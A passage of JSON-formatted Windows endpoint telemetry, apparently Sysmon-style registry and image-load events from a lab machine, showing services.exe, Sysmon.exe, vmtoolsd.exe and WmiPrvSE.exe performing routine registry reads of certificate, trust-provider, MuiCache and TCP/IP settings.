"timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": 
"LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - 
"process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
